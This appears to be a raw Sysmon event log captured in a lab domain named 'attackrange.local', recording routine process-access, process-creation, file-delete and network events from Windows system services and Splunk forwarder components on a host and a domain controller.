08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809602Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:27.099{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809601Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F74F-60EB-C479-00000000D001}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809600Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.099{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74F-60EB-C479-00000000D001}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809599Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.085{0C1E0330-F74F-60EB-C479-00000000D001}2808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.771{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52B901220FF250C9D8F1730927FF92C5,SHA256=B94BA6F6AB97A73A3BFA15C036C4FD135D61A9CE820E33CB830B5D40241B4E0B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:28.366{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2BDD27F3F32CD05F4AFA9C8F1B9C6B2,SHA256=31049A2091D4C3D30F6C273F4D7C8144C910399933ABE70720E22012C0E12C58,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F750-60EB-C679-00000000D001}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:28.459{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.459{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F750-60EB-C679-00000000D001}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809631Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.443{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F750-60EB-C679-00000000D001}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809630Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.444{0C1E0330-F750-60EB-C679-00000000D001}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809629Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:28.131{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECB3E9F22C68F43522114C41933D043B,SHA256=E59FE10CB7F284170C5202FC03B86AB6F39C9BB750C2E68E6B3970E8CB06895C,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000809646Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.389{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57408-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809645Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:29.787{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=828D1460348B38981E33A9FB2046C140,SHA256=93347B5669DE2649726C2C5E9D16AAD0D06676DD13EA9A7BC0EB99B9C285951C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:29.384{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80C63BD40C021FD130747853C19F584A,SHA256=3289558BFD19C6B62D62CCFD7C575C738875E1B4EBC55FB7BEC56F90AD0EC08C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809644Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:29.459{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA018E26015F91ADBB3FEBD6C8E77863,SHA256=58A913D20964CAFB78D76BEC42771440FE7B32A071D6031E657A92612F62EC05,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809648Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:30.818{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B01BF5411195269F8D72CC388FA0421C,SHA256=3E8D12C913FB828CF5642906BB4C064186D0F4BAB663127AC3B3602B43BB87F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:30.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4235F2B5D18615135A879A7B35F45192,SHA256=8EB39976B00DE42FE4A4A4EE5BF3053A40CB79C4BC9FC3ABF6E9D2BD0A7BC58B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809647Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:30.178{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=B73DF2774998FEB694BB63D196932C30,SHA256=2869AA420A724E8D73B5CE9E7297A4C2C034624E37E8E2E02D5FD129CA48A732,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:22.735{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61902-false10.0.1.12-8000- 23542300x8000000000000000809649Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:31.896{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57D77050E49214CE4D40F504D15A672D,SHA256=BAAE6C587C9D7E5A5528A70B9F4F1C49199A2F855B13B79A845D94C424EB0C46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:31.433{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDC7551F9AC0FF0D57C45C358D41A405,SHA256=AD59BE962CB73088260882D2194486E6AAD7AB04F29323943FCFA525545D657E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809650Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:32.896{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E413F079ECB0DBCACFC090159DF4DD8,SHA256=0776A4B35220F294FD3E1B605B14D1E36D77824ABD66A50D464C46BCC881D736,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:32.448{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=671E44AE0388544AAB583861BE709C0F,SHA256=5DC040145F95519A8FB0A59B4FE70A1238E9075A67CC294B9AA98827CB313108,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001053079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:32.217{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:32.217{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 